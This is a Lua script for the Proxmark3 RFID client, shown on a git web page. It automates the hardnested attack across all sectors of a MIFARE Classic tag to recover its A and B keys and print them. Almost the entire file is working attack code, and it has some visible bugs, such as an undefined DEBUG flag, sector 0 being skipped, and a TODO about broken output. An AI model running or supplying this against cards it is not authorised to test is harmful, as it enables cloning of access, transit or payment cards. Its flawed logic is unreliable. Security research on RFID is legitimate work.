]> git.zerfleddert.de Git - proxmark3-svn/blob - client/scripts/hard_autopwn.lua
projects / proxmark3-svn / blob
? search:


3f2ed870da0cdba099ab3663490a4f9ca253f605
[proxmark3-svn] / client / scripts / hard_autopwn.lua
1 local cmds = require('commands')
2 local getopt = require('getopt')
3 local utils = require('utils')
4 local lib14a = require('read14a')
5
6 example = "script iterates over all possible sectors for a tag and runs hardnested attack against them to collect the keys."
7 author = "Iceman"
8 desc =
9 [[
10 This script iterates over all possible sectors for a tag and runs hardnested attack against them to collect the keys.
11
12 Arguments:
13 -k Known key, 6 bytes (12 hex digits)
14 -a key A
15 -b key B
16 -s Blocknumber for known key
17 Examples :
18 script hard -k 112233445566
19 ]]
20
21 local numBlocks = 64
22 local numSectors = 16
23 local DEBUG = TRUE
24 ---
25 -- A debug printout-function
26 function dbg(args)
27 if not DEBUG then return end
28
29 if type(args) == "table" then
30 local i = 1
31 while result[i] do
32 dbg(result[i])
33 i = i+1
34 end
35 else
36 print("###", args)
37 end
38 end
39 ---
40 -- This is only meant to be used when errors occur
41 function oops(err)
42 print("ERROR: ",err)
43 return nil,err
44 end
45 ---
46 -- Usage help
47 function help()
48 print(desc)
49 print("Example usage")
50 print(example)
51 end
52 --
53 -- Exit message
54 function ExitMsg(msg)
55 print( string.rep('--',20) )
56 print( string.rep('--',20) )
57 print(msg)
58 print()
59 end
60 -- A little helper to place an item first in the list
61 local function placeFirst(akey, list)
62 akey = akey:lower()
63 if list[1] == akey then
64 -- Already at pole position
65 return list
66 end
67 local result = {akey}
68 --print(("Putting '%s' first"):format(akey))
69 for i,v in ipairs(list) do
70 if v ~= akey then
71 result[#result+1] = v
72 end
73 end
74 return result
75 end
76 -- A function to display the results
77 -- TODO: iceman 2016, still screws up output when a key is not found.
78 local function displayresults(results)
79 local sector, blockNo, keyA, keyB, succA, succB, _
80
81 print("|---|----------------|---|----------------|---|")
82 print("|sec|key A |res|key B |res|")
83 print("|---|----------------|---|----------------|---|")
84
85 for sector,_ in pairs(results) do
86 succA, succB, keyA, keyB = unpack(_)
87 print(("|%03d| %s | %s | %s | %s |"):format(sector, keyA, succA, keyB, succB))
88 end
89 print("|---|----------------|---|----------------|---|")
90
91 end
92
93 --[[
94 The mifare Classic 1k card has 16 sectors of 4 data blocks each.
95 The first 32 sectors of a mifare Classic 4k card consists of 4 data blocks and the remaining
96 8 sectors consist of 16 data blocks.
97 --]]
98 local function GetTargetBlockNo(sector)
99 local trgblockno = sector * 4 - 1
100 if sector > 32 then
101 trgblockno = 32 * 4 + (sector-32) * 16 -1
102 end
103 return ("%02x"):format(trgblockno)
104 end
105
106 ---
107 -- The main entry point
108 function main(args)
109
110 local blockno = '00'
111 local keytype
112 local key = 'fc00018778f7'
113 local trgkey = ''
114 local numSectors = 16
115
116 -- Read the parameters
117 for o, a in getopt.getopt(args, 'hk:abs:') do
118 if o == "h" then return help() end
119 if o == "k" then key = a end
120 if o == "a" then keytype = '0' end
121 if o == "b" then keytype = '1' end
122 if o == "s" then blockno = a end
123 end
124
125 keytype = keytype or '0'
126
127 -- Turn off Debug
128 local cmdSetDbgOff = "hf mf dbg 0"
129 core.console( cmdSetDbgOff)
130 -- identify tag
131 result, err = lib14a.read1443a(false)
132 if not result then
133 return oops(err)
134 end
135 core.clearCommandBuffer()
136
137 -- Show tag info
138 print((' Found tag %s'):format(result.name))
139
140 if 0x18 == result.sak then --NXP MIFARE Classic 4k | Plus 4k
141 -- IFARE Classic 4K offers 4096 bytes split into forty sectors,
142 -- of which 32 are same size as in the 1K with eight more that are quadruple size sectors.
143 numSectors = 40
144 elseif 0x08 == result.sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
145 -- 1K offers 1024 bytes of data storage, split into 16 sector
146 numSectors = 16
147 elseif 0x09 == result.sak then -- NXP MIFARE Mini 0.3k
148 -- MIFARE Classic mini offers 320 bytes split into five sectors.
149 numSectors = 5
150 elseif 0x10 == result.sak then-- "NXP MIFARE Plus 2k"
151 numSectors = 32
152 else
153 print("I don't know how many sectors there are on this type of card, defaulting to 16")
154 end
155
156 result = {}
157 for sector=1,numSectors do
158
159 local trgblockno = GetTargetBlockNo(sector)
160 local succA = 1
161 local succB = 1
162 local keyA = ''
163 local keyB = ''
164
165 for targetkeytype=0,1 do
166
167 -- skip first sector, KeyA...
168 -- or actually blockNo and keytype
169 -- just try default for now
170 if sector == 1 and targetkeytype == 0 then
171 keyA = tonumber(key,16)
172 else
173 local err, foundkey = core.hardnested(blockno, keytype, key, trgblockno, tostring(targetkeytype), trgkey, 0,0,0,0)
174 foundkey = foundkey or ""
175
176 if targetkeytype == 0 then
177 if err == nil or err > 0 then succA = 0 else keyA = foundkey end
178 else
179 if err == nil or err > 0 then succB = 0 else keyB = foundkey end
180 end
181 end
182
183 -- clearing BigBuff between hardnested executions seems to make it more stable.
184 core.clearCommandBuffer()
185 core.console('data buffclear')
186 end
187 -- Check if user aborted
188 if core.ukbhit() then
189 print("Aborted by user")
190 break
191 end
192 -- log
193 result[sector] = { succA, succB, utils.ConvertAsciiToHex(keyA), utils.ConvertAsciiToHex(keyB) }
194 end
195 displayresults(result)
196 end
197
198 main(args)
Proxmark3 GIT tracking
Impressum, Datenschutz